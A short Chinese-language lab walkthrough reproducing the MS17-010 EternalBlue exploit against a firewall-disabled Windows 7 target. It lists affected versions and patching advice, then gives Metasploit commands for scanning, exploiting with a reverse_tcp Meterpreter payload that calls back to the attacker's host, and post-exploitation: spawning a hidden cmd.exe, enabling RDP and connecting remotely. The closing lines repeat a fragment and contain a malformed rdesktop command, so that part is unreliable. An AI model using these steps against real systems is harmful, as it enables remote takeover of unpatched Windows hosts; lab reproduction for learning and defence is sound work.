MS17-010永恒之蓝复现

MS17-010永恒之蓝复现

漏洞危害

恶意代码可以利用445端口，对受害主机进行以下操作

1.远程代码执行。攻击者可利用该漏洞远程控制受害者的电脑。
2.永恒之蓝勒索病毒以及各种变种病毒。

出现的版本

Windows XP SP3

Windows 2003 SP2

Windows Vista

Windows Server 2008

Windows 7 SP1/Windows Server 2008 R2

Windows 8.1

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

Windows 10

Windows 10 1511

Windows 10 1607

修复方法

1、下载补丁
2、关闭445、135、137、138、139危险端口

实验目的

学习永恒之蓝的全过程，完成对永恒之蓝的复现和利用。

实验工具以及准备

Windows 7 x64 IP：192.168.174.131

kali linux 2019.03版 IP：192.168.174.130

最新版的metasploit

关闭win7的防火墙，打开445端口

实验过程

①　用kali终端输入命令msfconsole打开metasploit

②　查询msf中的漏洞：search ms17-010

③　扫描靶机是否存在漏洞

use auxiliary/scanner/smb/smb_ms17_010（使用扫描模块）

show options（查看选项）

set rhosts 192.168.174.131 （设置靶机的IP）
exploit（利用）

扫描结束提示主机可能存在漏洞，接下来就可以利用了

④　攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue（加载攻击模块）

set payload windows/x64/meterpreter/reverse_tcp（设置payload）

show options（查看选项）

set rhost 192.168.174.131 （设置靶机的IP）

set lhost 192.168.174.130 （设置发起攻击的主机IP）

set lport 443 （反弹shell）

启动

完成对永恒之蓝的利用，如果还需要执行其他操作的话，就是后渗透

后渗透

查看网络配置ipconfig

执行系统命令execute -H -i -f cmd.exe

开启3389远程连接：run getgui -e

进行远程连接

rdesktop -u 账号 -p 密码 meterpreter 192.168.174.131:3389

gui -e

进行远程连接

rdesktop -u 账号 -p 密码 meterpreter 192.168.174.131:3389